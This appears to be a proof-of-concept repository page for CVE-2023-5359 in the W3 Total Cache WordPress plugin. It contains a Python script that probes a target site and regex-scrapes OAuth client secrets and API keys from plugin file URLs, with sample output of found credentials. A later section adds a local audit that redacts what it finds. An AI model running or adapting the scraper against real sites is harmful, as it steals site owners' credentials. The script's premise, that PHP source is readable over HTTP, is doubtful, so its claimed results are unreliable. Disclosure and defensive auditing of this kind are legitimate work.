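Related vulnerability
Title:
WordPress plugin W3 Total Cache information disclosure vulnerability
(CVE-2023-5359)
Description: WordPress and WordPress plugin are both products of the WordPress Foundation. WordPress is a blogging platform developed in PHP. The platform supports setting up personal blog sites on servers running PHP and MySQL. WordPress plugin is an application plugin. WordPress plugin W3 Total Cache version 2.7.5 and earlier contain an information disclosure vulnerability, which stems from Google OAuth API secrets being stored in plaintext. An attacker can exploit this vulnerability to gain access to user account information.
Description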
Targets versions ≤2.7.5 vulnerable to CVE-2023-5359
Introduction
# Cleartext-Storage-vulnerability-CVE-2023-5359-in-W3-Total-Cache
Targets versions ≤2.7.5 vulnerable to CVE-2023-5359
```python
import requests
import re
from urllib.parse import urljoin

# Common paths where credentials are stored
CREDENTIAL_PATHS = [
    "/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php",
    "/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php",
    "/wp-content/plugins/w3-total-cache/Extension_FeedBurner_Plugin.php"
]


def check_w3tc_presence(target_url):
    """Check if W3 Total Cache is installed"""
    try:
        response = requests.get(target_url, timeout=10)
        if "wp-content/plugins/w3-total-cache" in response.text:
            return True
        return False
    except Exception as e:
        print(f"Connection error: {str(e)}")
        return False


def extract_credentials(target_url):
    """Extract plaintext credentials from vulnerable files"""
    credentials = {}
    for path in CREDENTIAL_PATHS:
        full_url = urljoin(target_url, path)
        try:
            response = requests.get(full_url, headers={"User-Agent": "Mozilla/5.0"})
            if response.status_code == 200:
                # Search for common credential patterns
                matches = re.findall(
                    r"(client_id|client_secret|api_key|oauth_token)\s*=\s*['\"]([a-zA-Z0-9-_]+)['\"]",
                    response.text
                )
                if matches:
                    credentials[path] = dict(matches)
        except Exception as e:
            continue
    return credentials


def main():
    target = input("Enter target URL (e.g., https://example.com): ").strip()
    if not check_w3tc_presence(target):
        print("[-] W3 Total Cache not detected")
        return
    print("[+] W3 Total Cache detected. Checking for CVE-2023-5359...")
    creds = extract_credentials(target)
    if creds:
        print("\n[!] Sensitive credentials found:")
        for filepath, data in creds.items():
            print(f"\nFile: {filepath}")
            for key, value in data.items():
                print(f" {key}: {value}")
    else:
        print("[+] No credentials found in common locations")


if __name__ == "__main__":
    main()
```
```
Enter target URL (e.g., https://example.com): https://vulnerable-site.com
[+] W3 Total Cache detected. Checking for CVE-2023-5359...

[!] Sensitive credentials found:

File: /wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
 client_id: GOxxxxxxxxxxxx78
 client_secret: ABcdEFghIJklMNopQRstUVwxYZ

File: /wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php
 api_key: AiiiihIwJKLmnopkhdhsQRSTUVWXYZ-123456
```
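A site owner's check for the condition described above, as an added example (not code from the original README or from the W3 Total Cache project): it reads the installed version from the plugin header in a local copy of the plugin and lists cleartext secret assignments in its PHP files, with the values redacted. The main-file name `w3-total-cache.php` is an assumption about the plugin layout, and the sample header and source are constructed.

```python
import re
from pathlib import Path

LAST_AFFECTED = (2, 7, 5)  # the page states versions <= 2.7.5 are affected
# Same assignment pattern the page's script searches for
SECRET_RE = re.compile(
    r"(client_id|client_secret|api_key|oauth_token)\s*=\s*['\"]([A-Za-z0-9_-]+)['\"]"
)

def parse_version(header_text):
    """Read 'Version: x.y.z' from a WordPress plugin header comment."""
    m = re.search(r"^[ \t/*#@]*Version:\s*(\d+(?:\.\d+)*)", header_text, re.M | re.I)
    return tuple(int(p) for p in m.group(1).split(".")) if m else None

def is_affected(version):
    """True when version <= 2.7.5; an unreadable version is treated as affected."""
    if version is None:
        return True
    width = max(len(version), len(LAST_AFFECTED))
    padded = [v + (0,) * (width - len(v)) for v in (version, LAST_AFFECTED)]
    return padded[0] <= padded[1]

def find_hardcoded_secrets(name, source):
    """Return (file, line_no, key, redacted_value) for each cleartext assignment."""
    hits = []
    for line_no, line in enumerate(source.splitlines(), 1):
        for key, value in SECRET_RE.findall(line):
            hits.append((name, line_no, key, value[:2] + "*" * (len(value) - 2)))
    return hits

def audit_plugin_dir(plugin_dir):
    """Audit an on-disk copy of the plugin; the path is supplied by the operator."""
    root = Path(plugin_dir)
    main = root / "w3-total-cache.php"  # assumed name of the plugin's main file
    version = parse_version(main.read_text(errors="replace")) if main.exists() else None
    hits = []
    for php in sorted(root.rglob("*.php")):
        hits += find_hardcoded_secrets(str(php.relative_to(root)), php.read_text(errors="replace"))
    return {"version": version, "affected": is_affected(version), "hits": hits}

# Constructed sample input (not taken from the plugin's real source)
SAMPLE_HEADER = "/*\nPlugin Name: W3 Total Cache\nVersion: 2.7.5\n*/"
SAMPLE_SOURCE = "<?php\n$client_id = 'EXAMPLE-ID-0001';\n$client_secret = \"EXAMPLEsecret42\";\n"

if __name__ == "__main__":
    print(is_affected(parse_version(SAMPLE_HEADER)))
    for hit in find_hardcoded_secrets("sample.php", SAMPLE_SOURCE):
        print(hit)
```

An affected result calls for updating the plugin past 2.7.5 and rotating any secret the scan lists.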
File snapshot
[4.0K] /data/pocs/58cd5d92689fe991ed7e00c8294e3a26ece6799e
└── [2.7K] README.md
0 directories, 1 file